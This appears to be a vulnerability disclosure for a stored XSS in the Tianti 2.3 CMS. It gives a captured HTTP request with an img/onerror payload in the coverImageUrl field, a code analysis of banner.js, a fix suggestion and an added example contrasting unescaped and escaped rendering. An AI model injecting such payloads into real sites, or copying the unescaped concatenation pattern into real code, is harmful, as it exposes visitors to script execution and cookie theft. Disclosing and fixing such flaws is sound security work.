Description
Affected version
tianti 2.3 (latest)
Vulnerability description
When publishing an article, replacing the cover image URL with an XSS payload results in a stored XSS that fires for every user who visits the homepage, executing arbitrary attacker-controlled script in their browser.
Vulnerability proof
First, click "Add article".
Then click "Save" and use Burp Suite to intercept the request.
The contents of the request are as follows:
POST /tianti-module-admin/cms/article/ajax/save HTTP/1.1
Host: localhost:8788
Content-Length: 175
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:8788
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8788/tianti-module-admin/cms/article/edit?id=&rootColumnId=4028821e5b7a0971015b7a0a1cbf0000&columnId=
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=C3CECD5A2F0AB3FACCB8ABF51ED69EFC; Idea-de19657=aa310384-4713-4a24-b305-e8293e29c9bd
Connection: close
id=&coverImageUrl="><img+src=1+onerror=alert("document.cookie")>&rootColumnId=4028821e5b7a0971015b7a0a1cbf0000&leafColumnId=4028abdf9491287b019491f101e2000b&articleType=contentType&title=test&href=&publisher=test&orderNo=
Set the value of the coverImageUrl parameter to the XSS PoC -> "><img src=1 onerror=alert(1)>
After forwarding the request, visiting the front-end homepage of the Tianti site triggers the XSS:
Code analysis
In ~/tianti-2.3/tianti-modules/tianti-module-gateway/src/main/webapp/static/template/banner.js:
The stored value is concatenated directly into the HTML without any escaping.
Repair suggestions
HTML-escape user-supplied data before rendering it in the page.
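An added example (not Tianti's own banner.js, whose exact code is not reproduced here) showing the concatenation pattern the report describes next to its escaped form, using the payload shape from the request above; the URL-scheme check is an extra assumption beyond the report's fix:

```javascript
// Added example modelling the report: `renderBannerUnsafe` concatenates the
// stored coverImageUrl straight into markup, `renderBannerSafe` escapes it first.
const escapeHtml = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);

// Vulnerable form (hypothetical reconstruction): the attacker-controlled value
// lands inside an attribute unescaped, so `">` closes the tag and the rest of
// the payload becomes live markup.
function renderBannerUnsafe(article) {
  return '<img class="cover" src="' + article.coverImageUrl + '">';
}

// Hardened form: escape at the point the value enters HTML, as the report
// recommends. The payload is now inert text inside the attribute.
function renderBannerSafe(article) {
  return '<img class="cover" src="' + escapeHtml(article.coverImageUrl) + '">';
}

// Extra defence-in-depth check (assumption, not in the report): only accept
// absolute http(s) URLs for the cover image, rejecting javascript:, data: and
// values that do not parse as a URL at all.
function isAcceptableImageUrl(value) {
  try {
    const u = new URL(String(value));
    return u.protocol === 'http:' || u.protocol === 'https:';
  } catch (e) {
    return false;
  }
}

// Constructed sample using the payload shape from the captured request.
const poisoned = { coverImageUrl: '"><img src=1 onerror=alert(1)>' };
console.log(renderBannerUnsafe(poisoned)); // tag is broken open, <img onerror> executes
console.log(renderBannerSafe(poisoned));   // payload stays inside the src attribute as text
```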